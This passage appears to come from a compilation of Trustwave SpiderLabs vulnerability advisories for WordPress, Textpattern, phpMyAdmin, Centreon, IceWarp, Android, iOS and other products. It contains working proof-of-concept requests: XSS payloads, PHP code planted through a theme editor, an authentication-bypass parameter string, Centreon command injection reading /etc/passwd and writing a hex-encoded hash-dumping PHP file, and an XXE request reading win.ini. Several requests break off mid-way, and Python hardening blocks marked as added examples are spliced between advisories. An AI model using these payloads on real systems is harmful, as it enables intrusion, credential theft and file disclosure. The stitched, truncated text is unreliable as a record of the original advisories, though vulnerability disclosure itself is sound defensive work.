User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=2
Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
If-Modified-Since: Wed, 07 Dec 2011 16:03:33 GMT

3.) Get PHP Code Execution

Malicious user edits 404.php via the Themes Editor as follows:

<?php phpinfo(); ?>

Note #1: Any PHP file in the theme could be used.
Note #2: Depending on settings, PHP may be used to execute system commands on the web server.

Malicious user performs a GET request of the modified page to execute the code.

Request
---
GET /wp-content/themes/default/404.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1

4.) Get Persistent Cross Site Scripting

Malicious User injects malicious JavaScript into their own MySQL database instance

MySQL Query
---
update wp_comments SET comment_content='<script>alert('123')</script>' where comment_content='Hi, this is a comment.<br />To delete \
a comment, just log in and view the post&#039;s comments. There you will have the option to edit or delete them.';

Non-malicious User visits the WordPress installation and has the JavaScript executed in their browser

Request
---
GET /?p=1 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1

Finding 2: Multiple Cross Site Scripting Vulnerabilities in 'setup-config.php' page
CVE: CVE-2012-0782

The WordPress 'setup-config.php' installation page allows users to install WordPress using a local or remote MySQL database. When using this installation page, the user is asked to supply the database name, the server that the database resides on, and a valid MySQL username and password. During this process, malicious users can supply JavaScript within the dbname, dbhost or uname parameters. Upon clicking the submission button, the JavaScript is rendered in the client's browser.

Proof of Concept:

Servers Involved
A.B.C.D = Target WordPress Web Server

Request
---
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Content-Type:
TWSL2012-001: Cross-Site Scripting Vulnerability in Textpattern Content Management System
Trustwave's SpiderLabs Security Advisory TWSL2012-001:
Cross-Site Scripting Vulnerability in Textpattern Content Management System

Published: 1/03/12
Version: 1.0

Vendor: Textpattern (http://textpattern.com/)
Product: Textpattern
Version affected: 4.4.1 before change set 3612

Product description:
Textpattern is an open source content management system originally developed by Dean Allen. While it is often listed among weblogging tools, its aim is to be a general-purpose content management system suitable for deployment in many contexts. Textpattern is written in PHP using a MySQL database backend.

Credit: Jonathan Claudius of Trustwave SpiderLabs

Finding 1: Cross-Site Scripting Vulnerability
CVE: CVE-2011-5019

After extracting the Textpattern source files onto a web server, but before the application is fully installed, cross-site scripting vulnerabilities are present in the '/textpattern/setup/index.php' page.

Example(s):

Performing XSS on the ddb parameter

#Request
POST /textpattern/setup/index.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/textpattern/setup/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 156

duser=blah&dpass=&dhost=localhost&ddb=%3Cscript%3Ealert%28%27123%27%29%3C%2Fscript%3E&dprefix=&siteurl=A.B.C.D&Submit=next&lang=en-us&step=printConfig

#Response
HTTP/1.1 200 OK
Date: Sat, 10 Dec 2011 02:46:44 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.2
Content-Length: 674
Connection: close
Content-Type: text/html; charset=utf-8

--snip--
<div align="center"><p>Checking database connection</p><p>Connected</p><p>Database <strong><script>alert('123')</script></strong> does not exist or your specified user does not have permission to access it.</p>

Remediation Steps:
Textpattern change set 3612 includes a fix for this security issue. Upgrade to the latest version.

Revision History:
12/23/11 - Vulnerability disclosed
12/23/11 - Patch released by vendor
1/03/12 - Advisory published
TWSL2011-019: Cross-Site Scripting Vulnerability in phpMyAdmin
Trustwave's SpiderLabs Security Advisory TWSL2011-019:
Cross-Site Scripting Vulnerability in phpMyAdmin
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-019.txt

Published: 12/22/11
Version: 1.0

Vendor: phpMyAdmin (http://www.phpmyadmin.net/)
Product: phpMyAdmin
Version affected: 3.4.8 and prior

Product description:
An open source tool developed in PHP to manage and administer MySQL databases remotely. The web browser interface allows creating, modifying or deleting databases, tables, fields or rows, executing SQL statements, and other database functions.

Credit: Jason Leyrer of Trustwave SpiderLabs

Finding 1: Cross-Site Scripting (XSS) Vulnerability in Setup Interface
CVE: CVE-2011-4782

Affected versions of phpMyAdmin do not sanitize user-supplied server names before displaying them in the Setup Overview. This allows remote attackers to execute arbitrary web scripts or HTML via a crafted request.

phpMyAdmin allows users to add database servers via its Setup interface. Since phpMyAdmin does not do any input validation on server hostnames when they are entered, it is up to whatever displays these names throughout the application to use htmlspecialchars() (or similar) to sanitize them.

phpMyAdmin uses a function called perform_config_checks() to perform a series of compatibility, security and consistency checks on application configuration options. If it finds settings that are contrary to best practices, perform_config_checks() generates messages to be displayed to users at the top of the Setup Overview page. The messages generated for some of these configuration options ($cfg['Servers'][$i]['ssl'], $cfg['Servers'][$i]['extension'], $cfg['Servers'][$i]['auth_type'], $cfg['Servers'][$i]['AllowRoot'], and $cfg['Servers'][$i]['AllowNoPassword']) are constructed using user-supplied hostnames without any sanitization taking place. This can lead to web script being executed when the Setup Overview page is loaded.

The following is a Proof of Concept (PoC):

1. Request the Setup interface's index page in order to obtain the phpMyAdmin cookie and the value of 'token', which appears in the response body:

Request
---
GET /phpmyadmin/setup/index.php HTTP/1.1
---

Response
---
HTTP/1.1 200 OK
Date: Thu, 01 Dec 2011 16:42:17 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.2
Set-Cookie: phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf; path=/phpmyadmin/setup/; HttpOnly
Expires: Thu, 01 Dec 2011 16:42:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 01 Dec 2011 16:42:17 GMT
Set-Cookie: pma_lang=en; expires=Sat, 31-Dec-2011 16:42:17 GMT; path=/phpmyadmin/setup/; httponly
X-Frame-Options: SAMEORIGIN
X-Content-Security-Policy: allow 'self'; options inline-script eval-script; frame-ancestors 'self'; img-src 'self' data:; script-src 'self' www.phpmyadmin.net
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 7722
Content-Type: text/html; charset=utf-8

---snip---
<input type="hidden" name="token" value="5acce3a965bbe9d42ce50bdf3d491ed9" />
---

2. Input javascript (%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E) into the 'Servers-0-host' input field in Add New Server mode, as shown in the post data of the following request:

Request
---
POST /phpmyadmin/setup/index.php?phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf&tab_hash=&check_page_refresh=1&lang=en&collation_connection=utf8_general_ci&token=5acce3a965bbe9d42ce50bdf3d491ed9&page=servers&mode=add&submit=New+server HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/phpmyadmin/setup/index.php?phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf&tab_hash=&check_page_refresh=1&lang=en&collation_connection=utf8_general_ci&token=5acce3a965bbe9d42ce50bdf3d491ed9&page=servers&mode=add&submit=New+server
Cookie: phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf; pma_lang=en
Content-Type: application/x-www-form-urlencoded
Content-Length: 1430
---
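The remediation the finding implies is output encoding of every untrusted hostname at the point it is rendered, not input validation alone. The following Python sketch is an added example, not phpMyAdmin's own code: it models perform_config_checks()-style messages for the five settings named above, shows the unsafe interpolation beside an escaped version (html.escape is Python's counterpart of htmlspecialchars()), and adds a checker that flags any markup in the rendered fragment that the template did not put there. The check predicates, message texts and the sample server entry are constructed for illustration.

```python
import html
import re

# Constructed config checks modelled on the settings the advisory names.
# Each predicate returns True when the setting is against best practice.
CHECKS = {
    "ssl": lambda s: not s.get("ssl", False),
    "auth_type": lambda s: s.get("auth_type") == "config",
    "AllowRoot": lambda s: s.get("AllowRoot", True),
    "AllowNoPassword": lambda s: s.get("AllowNoPassword", False),
}

# Illustrative message texts (not phpMyAdmin's wording); {host} is user-controlled.
MESSAGES = {
    "ssl": "Server {host}: SSL is not enabled",
    "auth_type": "Server {host}: auth_type 'config' stores credentials on disk",
    "AllowRoot": "Server {host}: root login is allowed",
    "AllowNoPassword": "Server {host}: empty passwords are allowed",
}


def render_messages_unsafe(servers):
    """Vulnerable pattern: the user-supplied host is interpolated into HTML as-is."""
    out = []
    for server in servers:
        for key, failing in CHECKS.items():
            if failing(server):
                out.append("<li>" + MESSAGES[key].format(host=server["host"]) + "</li>")
    return "\n".join(out)


def render_messages_safe(servers):
    """Hardened pattern: every untrusted value is escaped at the HTML output boundary."""
    out = []
    for server in servers:
        # html.escape(..., quote=True) escapes < > & " ' like htmlspecialchars(ENT_QUOTES)
        safe_host = html.escape(server["host"], quote=True)
        for key, failing in CHECKS.items():
            if failing(server):
                out.append("<li>" + MESSAGES[key].format(host=safe_host) + "</li>")
    return "\n".join(out)


# Any tag other than the <li>/</li> wrapper the template itself emits.
TAG_RE = re.compile(r"<(?!/?li>)[a-zA-Z/]")


def contains_foreign_markup(rendered):
    """True if the rendered fragment carries a tag that did not come from the template."""
    return TAG_RE.search(rendered) is not None


# Constructed server entry whose hostname is the payload from the PoC above.
SAMPLE_SERVERS = [{"host": "<script>alert('XSS');</script>", "ssl": False, "auth_type": "cookie"}]
```

Running contains_foreign_markup() over the output of both renderers gives a cheap regression test for this class of bug: the unsafe renderer leaks the script tag into the page, the safe one emits only entity-encoded text.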
TWSL2011-018: Authentication Bypass Vulnerability in IBM TS3100/TS3200 Web User Interface
Trustwave's SpiderLabs Security Advisory TWSL2011-018:
Authentication Bypass Vulnerability in IBM TS3100/TS3200 Web User Interface
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-018.txt

Published: 2011-12-20
Version: 1.0

Vendor: IBM (http://www.ibm.com)
Product: TS3100/TS3200 Tape Library
Version affected: Firmware less than A.60

Product description:
Entry-level tape library designed to provide reliable, high capacity, high performance tape backup. The TS3100/TS3200 models and their storage management applications are designed to address capacity, performance, data protection, reliability, availability, affordability and application requirements. It is designed as a functionally rich, entry tape-storage solution incorporating LTO Ultrium tape technology.

Credit: Martin Murfitt of Trustwave SpiderLabs

Finding: Authentication Bypass (Web Management Console)
CVE: CVE-2011-1372

The IBM TS3100/TS3200 Web User Interface is vulnerable to an authentication bypass attack. By sending a series of requests to the authentication function, it is possible to trigger a condition which causes the application to grant an access cookie which permits remote administration.

Repeated queries using the following HTTP query arguments provided administrative access to the appliance after several tries:

'user_level=3&password=aaa&login=Log+in'

The password is not believed to be significant. Once access is granted, the following cookies are set on the client's browser:

Cookie: RMU_LEVEL=3; RMU_LOGIN=

Remediation Steps:
Update firmware version to A.60 or above.

Revision History:
1/17/11 - Vulnerability disclosed
11/18/11 - Patch released by vendor
12/20/11 - Advisory published

References
1. http://www-03.ibm.com/systems/storage/tape/ts3200/

About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com

About Trustwave's SpiderLabs:
SpiderLabs is the advanced security team at Trustwave responsible for incident response and forensics, ethical hacking and application security tests for Trustwave's clients. SpiderLabs has responded to hundreds of security incidents, performed thousands of ethical hacking exercises and tested the security of hundreds of business applications for Fortune 500 organizations. For more information visit https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided as is without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
TWSL2011-017: Multiple Vulnerabilities in Merethis Centreon
Trustwave's SpiderLabs Security Advisory TWSL2011-017:
Multiple Vulnerabilities in Merethis Centreon
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-017.txt

Published: 2011-11-04
Version: 1.0

Vendor: Merethis (http://www.merethis.com and http://www.centreon.com)
Product: Centreon
Version affected: 2.3.1 and prior

Product description:
Centreon is a network supervision and monitoring tool that is based upon the Nagios open source monitoring engine. Centreon can be used as a Nagios GUI and it can provide such features as real time system monitoring, performance management and system management.

Credit: Christophe De La Fuente of Trustwave SpiderLabs

Finding 1: Remote Command Execution

The Centreon supervision and monitoring tool provided by Merethis permits remote code execution from the command help web page, allowing an attacker to execute arbitrary commands in the context of the web server hosting the application. Any account that has been granted access to Configuration > Nagios > Checks is able to execute commands.

The following Proof of Concept (PoC) executes the command 'cat /etc/passwd':

http://example.domain/centreon/main.php?p=60706&command_name=/Centreon/SNMP/../../../../bin/cat%20/etc/passwd%20%23&o=h&min=1

Finding 2: One-Way Hash Without a Salt

The following code at lines 329-349 of www/include/configuration/nconfigObject/contact/DB-Func.php shows the insertContactInDB() function inserting the MD5 or SHA1 password hash into the database without using a salt:

---
$rq = "INSERT INTO `contact` " .
      "(`contact_id`, `timeperiod_tp_id`, `timeperiod_tp_id2`, `contact_name`, " .
      "`contact_alias`, `contact_autologin_key`, `contact_passwd`, `contact_lang`, `contact_template_id`, " .
      "`contact_host_notification_options`, `contact_service_notification_options`, " .
      "`contact_email`, `contact_pager`, `contact_comment`, `contact_oreon`, `contact_register`, `contact_enable_notifications`, " .
      "`contact_admin`, `contact_type_msg`, `contact_activate`, `contact_auth_type`, " .
      "`contact_ldap_dn`, `contact_location`, `contact_address1`, `contact_address2`, " .
      "`contact_address3`, `contact_address4`, `contact_address5`, `contact_address6`) " .
      "VALUES (";
$rq .= "NULL, ";
isset($ret["timeperiod_tp_id"]) && $ret["timeperiod_tp_id"] != NULL ? $rq .= "'" . $ret["timeperiod_tp_id"] . "', " : $rq .= "NULL, ";
isset($ret["timeperiod_tp_id2"]) && $ret["timeperiod_tp_id2"] != NULL ? $rq .= "'" . $ret["timeperiod_tp_id2"] . "', " : $rq .= "NULL, ";
isset($ret["contact_name"]) && $ret["contact_name"] != NULL ? $rq .= "'" . htmlentities($ret["contact_name"], ENT_QUOTES, "UTF-8") . "', " : $rq .= "NULL, ";
isset($ret["contact_alias"]) && $ret["contact_alias"] != NULL ? $rq .= "'" . htmlentities($ret["contact_alias"], ENT_QUOTES, "UTF-8") . "', " : $rq .= "NULL, ";
isset($ret["contact_autologin_key"]) && $ret["contact_autologin_key"] != NULL ? $rq .= "'" . htmlentities($ret["contact_autologin_key"], ENT_QUOTES) . "', " : $rq .= "NULL, ";
// Password column: a bare digest of the password with no per-user salt in every branch.
if ($encryptType == 1)
    isset($ret["contact_passwd"]) && $ret["contact_passwd"] != NULL ? $rq .= "'" . md5($ret["contact_passwd"]) . "', " : $rq .= "NULL, ";   // unsalted MD5
else if ($encryptType == 2)
    isset($ret["contact_passwd"]) && $ret["contact_passwd"] != NULL ? $rq .= "'" . sha1($ret["contact_passwd"]) . "', " : $rq .= "NULL, ";  // unsalted SHA1
else
    isset($ret["contact_passwd"]) && $ret["contact_passwd"] != NULL ? $rq .= "'" . md5($ret["contact_passwd"]) . "', " : $rq .= "NULL, ";   // default: unsalted MD5
---

The combination of unsalted hashes and Finding 1 allows an attacker to recover passwords for all accounts. The following example illustrates this attack. The following PHP code will dump the hashes of all users:

---
<?php
require_once ("/etc/centreon/centreon.conf.php");
require_once "$classdir/centreonDB.class.php";
$p = new CentreonDB();
$r = $p->query("SELECT contact_passwd from centreon.contact");
while ($w = $r->fetchRow()) { echo $w["contact_passwd"] . "<br>"; }
?>
---

To upload and execute this code on the server, one method is to convert the above PHP code to hexadecimal and use the remote code execution method outlined in Finding 1 to create a server-side PHP file. The length of the URL accepted in this case is limited, so the file must be broken into three parts. The following requests create the PHP file test.php:

http://example.domain/centreon/main.php?p=60706&command_name=/Centreon/SNMP/../../../../usr/bin/printf%20\\x3c\\x3f\\x70\\x68\\x70\\x20\\x72\\x65\\x71\\x75\\x69\\x72\\x65\\x5f\\x6f\\x6e\\x63\\x65\\x20\\x28\\x22\\x2f\\x65\\x74\\x63\\x2f\\x63\\x65\\x6e\\x74\\x72\\x65\\x6f\\x6e\\x2f\\x63\\x65\\x6e\\x74\\x72\\x65\\x6f\\x6e\\x2e\\x63\\x6f\\x6e\\x66\\x2e\\x70\\x68\\x70\\x22\\x29\\x3b\\x20\\x72\\x65\\x71\\x75\\x69\\x72\\x65\\x5f\\x6f\\x6e\\x63\\x65\\x20\\x22\\x24\\x63\\x6c\\x61\\x73\\x73\\x64\\x69\\x72\\x2f\\x63\\x65\\x6e\\x74%20|tee%20-a%20test.php%20%23&o=h&min=1
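Finding 2 matters because an unsalted digest is a pure function of the password: two users with the same password share one hash, and one precomputed table cracks the whole contact table at once. The following Python block is an added example, not Centreon's code, contrasting the unsalted pattern with a salted, iterated scheme (PBKDF2-HMAC-SHA256 from the standard library; the storage string format and the iteration count are this example's own choices) and a constant-time verifier.

```python
import base64
import hashlib
import hmac
import os

ITERATIONS = 600_000   # PBKDF2-HMAC-SHA256 work factor; tune so one hash costs ~100 ms on the target host
SALT_BYTES = 16


def unsalted_md5(password: str) -> str:
    """The pattern the advisory describes: the digest depends only on the password,
    so identical passwords give identical hashes and one crack unlocks every match."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def hash_password(password: str, salt: bytes = None) -> str:
    """Salted, iterated hash. Storage format is this example's own convention:
    pbkdf2_sha256$<iterations>$<base64 salt>$<base64 digest>"""
    if salt is None:
        salt = os.urandom(SALT_BYTES)          # fresh random salt per stored password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return "$".join([
        "pbkdf2_sha256",
        str(ITERATIONS),
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(digest).decode("ascii"),
    ])


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        scheme, iterations, salt_b64, digest_b64 = stored.split("$")
    except ValueError:
        return False                            # malformed record: fail closed
    if scheme != "pbkdf2_sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(digest_b64)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iterations))
    return hmac.compare_digest(candidate, expected)


def same_password_same_hash(password: str, hasher) -> bool:
    """Does hashing the same password twice give the same stored string?
    True for the unsalted scheme (the weakness), False once a random salt is used."""
    return hasher(password) == hasher(password)
```

The salt is stored in the clear beside the digest; its job is not secrecy but uniqueness, which is what defeats shared rainbow tables across accounts. The iteration count is stored too, so it can be raised later without invalidating existing records.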
TWSL2011-014: Vulnerability in Pantech Web Browser SSL Implementation
Trustwave's SpiderLabs Security Advisory TWSL2011-014:
Vulnerability in Pantech Web Browser SSL Implementation
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-014.txt

Published: 2011-09-23
Version: 1.0

Vendor: Pantech (http://www.pantechusa.com)
Product: Link P7040P, others may be vulnerable
Version affected: JLUS040201 confirmed, others may be vulnerable

Product description:
The Pantech Link is a mobile phone supporting a 2.4 LCD screen and full keyboard that facilitates simple text messaging.

Credit: Paul Kehrer of Trustwave SpiderLabs

Finding: Vulnerability in Pantech Web Browser SSL Implementation

Pantech Link/P7040P browser SSL certificate parsing contains a flaw where it fails to check the Basic Constraints parameter of certificates in the chain. By signing a new certificate using a legitimate end entity certificate, an attacker can obtain a valid certificate for any domain. For example:

-TrustedCA
--somedomain.com (legitimate certificate)
---api.someotherdomain.com (signed by somedomain.com)

Using this technique any SSL traffic using the api.someotherdomain.com certificate can be intercepted transparently to the end user if the attacker is in control of the network.

Revision History:
08/12/11 - Vulnerability Disclosed
09/23/11 - Advisory Published

Remediation Steps:
This vulnerability has not been addressed at the time of this advisory. Mobile users should be aware of this issue and proceed with caution when transmitting SSL traffic.
TWSL2011-013: Multiple Vulnerabilities in IceWarp Mail Server
Trustwave's SpiderLabs Security Advisory TWSL2011-013:
Multiple Vulnerabilities in IceWarp Mail Server
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt

Published: 2011-09-23
Version: 1.0

Vendor: IceWarp (http://www.icewarp.com)
Product: IceWarp Mail Server
Version affected: 10.3.2 and below

Product description:
IceWarp WebMail is the web front-end for the IceWarp Mail Server, which provides email access on over 50,000 servers. IceWarp WebMail provides web-based access to email, calendars, contacts, files and shared data from any computer with a browser and Internet connection.

Credit: David Kirkpatrick of Trustwave's SpiderLabs

Finding 1: XML External Entity Injection
CVE: CVE-2011-3579

An external entity is a function of the XML specification which allows XML documents to reference resources external to the XML document. This functionality forces the XML parser of the application to access the resource specified. In this case it is possible to inject an XML DOCTYPE SYSTEM directive to access local files on the operating system where the IceWarp server is installed. Using this technique it is possible to retrieve readable files on the operating system. This attack can also be used to create a possible denial of service condition.

Proof-of-Concept:
The following POST request was sent to the host A.B.C.D where the IceWarp mail server was running:

REQUEST
=======
POST /-.._._.--.._1243848280/server/webmail.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D
Content-Length: 249
Content-Type: application/xml;charset=UTF-8
Pragma: no-cache
Cache-Control: no-cache

<!DOCTYPE foo [<!ENTITY xxeb91c4 SYSTEM "file:///c:/windows/win.ini">]>
<iq type="set"><query xmlns="webmail:iq:auth"><username>test&xxeb91c4;</username><digest>828cd27c6fb73ee32674602e9c5521f005c614f5fb9266fd071dab323b5079e02d47a421c01df2efffcd2bdb221e15bf2baa4acefe38f264d92d152878ca4d33</digest><method>RSA</method></query></iq>

RESPONSE
========
HTTP/1.1 200 OK
Server: IceWarp/9.4.2
Date: Wed, 20 Jul 2011 10:04:56 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/xml
Vary: Accept-Encoding
Content-Length: 1113

<?xml version="1.0" encoding="utf-8"?><iq type="error"><error uid="login_invalid">test; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 ... TRUNCATED

The above proof-of-concept would retrieve the c:\windows\win.ini file (the response in this example has been truncated).

Finding 2: PHP Information Disclosure
CVE: CVE-2011-3580

It is possible to retrieve the PHP information file phpinfo() by accessing the following URL:

http://A.B.C.D/server

where A.B.C.D is the IP of the server running the IceWarp software. The response will be a page detailing the PHP version used and the configuration settings of PHP, including system details.
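The root cause in Finding 1 is a parser that accepts a DTD from the client and then resolves the SYSTEM entity it declares. The defensive rule is to refuse any DOCTYPE in client-supplied XML before entities can be declared at all. The following Python block is an added example, not IceWarp's code: it wraps the standard-library expat parser with handlers that reject DOCTYPE and entity declarations, returns a flat path-to-text map for accepted documents, and runs two constructed documents through it, one benign and one carrying a DTD shaped like the request above (with a placeholder file path).

```python
from xml.parsers import expat


class DtdRejected(ValueError):
    """Raised when untrusted XML carries a DOCTYPE or entity declaration."""


def parse_untrusted_xml(data: bytes) -> dict:
    """Parse XML from an untrusted client, refusing any DTD up front.

    Returns {element path: text}. Rejecting the DOCTYPE means neither internal
    nor external (SYSTEM) entities can ever be declared, so a resolver that
    would follow file:// references never gets the chance.
    """
    parser = expat.ParserCreate()

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdRejected("DOCTYPE declarations are not accepted from clients")

    def reject_entity(*args):
        raise DtdRejected("entity declarations are not accepted from clients")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    # Belt and braces: returning a false value makes expat treat any external
    # entity reference as a fatal parse error instead of fetching it.
    parser.ExternalEntityRefHandler = lambda context, base, sysid, pubid: False

    result = {}
    path = []

    def start(name, attrs):
        path.append(name)
        result.setdefault("/".join(path), "")

    def end(name):
        path.pop()

    def chars(text):
        # expat may deliver text in several chunks; concatenate per element.
        key = "/".join(path)
        result[key] = result.get(key, "") + text

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    parser.Parse(data, True)
    return result


# Constructed sample documents (not captured traffic).
BENIGN_LOGIN = (
    b'<iq type="set"><query xmlns="webmail:iq:auth">'
    b'<username>test</username><method>RSA</method></query></iq>'
)
DTD_LOGIN = (
    b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///PLACEHOLDER/path">]>'
    b'<iq type="set"><query xmlns="webmail:iq:auth">'
    b'<username>test&xxe;</username></query></iq>'
)


def is_accepted(data: bytes) -> bool:
    """True if the document parses under the no-DTD policy."""
    try:
        parse_untrusted_xml(data)
        return True
    except DtdRejected:
        return False
```

Rejecting at the DOCTYPE rather than at entity resolution also closes the denial-of-service angle the finding mentions: recursive or oversized internal entities are never defined in the first place.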
Vendor Response:
These issues have been addressed as of version 10.3.3.

Remediation Steps:
Customers should update to the latest version of IceWarp Mail Server in order to address these issues. The above issues have been corrected in version 10.3.3.

Revision History:
08/03/11 - Vulnerability disclosed
09/19/11 - Patch released
09/23/11 - Advisory published
TWSL2011-008: Focus Stealing Vulnerability in Android
Trustwave's SpiderLabs Security Advisory TWSL2011-008:
Focus Stealing Vulnerability in Android
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-008.txt

Published: 2011-08-06
Version: 1.0

Vendor: Google (http://www.android.com/)
Product: Android
Versions affected: Tested on 2.1 - 2.3. Other versions may also be affected.

Product description:
Android is an open-source software stack for mobile devices which includes an operating system, key applications, and middleware. The Android mobile operating system is based on a modified version of the Linux kernel. Android is currently owned and developed by Google.

Credit: Sean Schulte of Trustwave

Finding 1: Covert Focus Stealing

Android uses Intents and Activities such that the preferred application is always used for any given content/context. For example, a URL can always be opened with the Browser, and an image can be opened with the Gallery, Gmail or Twitter. To make this seamless for the user, switching between Activities always uses the same animation, whether the Activity belongs to the same app or a different app.

Additionally, a service running in the background is able to 1) determine which app is currently running in the foreground, and 2) display an Activity defined in its own app (i.e., not the current foreground app).

These two features combine to allow a malicious developer to run a service that looks for apps it knows how to attack, and display a login screen to the user when those apps run. For example, when the user opens an app which requires a login, the malicious service displays a screen that looks identical to the legitimate login screen. Android gives no indication that the login screen actually belongs to a different app, and the Activity-switching animation would be the same whether or not the real app had legitimately displayed its login screen. In the case of a pixel-perfect malicious login screen, the user would have no visual indication that the focus has switched from the legitimate screen.

When the user supplies his credentials, they can be sent to a remote server, allowing the attacker to steal the user's credentials without his knowledge. Any app that supplies a login screen is vulnerable to this attack.

Remediation Steps:
This vulnerability has not been fixed at the time of this advisory. As an alternative solution, users should be cautious when downloading third-party applications. Because of the nature of the vulnerability, a malicious application must be installed for a user to be vulnerable.

Revision History:
03/18/11 - Vulnerability Disclosed to Google
07/08/11 - Publication/Disclosure Discussed with Vendor
08/06/11 - Advisory Published
TWSL2011-007: iOS SSL Implementation Does Not Validate Certificate Chain
Trustwave's SpiderLabs Security Advisory TWSL2011-007:
iOS SSL Implementation Does Not Validate Certificate Chain
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-007.txt

Published: 2011-07-25
Version: 1.0

Vendor: Apple (http://www.apple.com)
Product: iOS
Version affected: Versions prior to 5.0b4, 4.3.5, and 4.2.10

Product description:
iOS is Apple's mobile operating system for the iPhone, iPod Touch, and iPad hardware platforms.

Credit: Paul Kehrer of Trustwave

Finding: iOS SSL Implementation Does Not Validate Certificate Chain
CVE: CVE-2011-0228

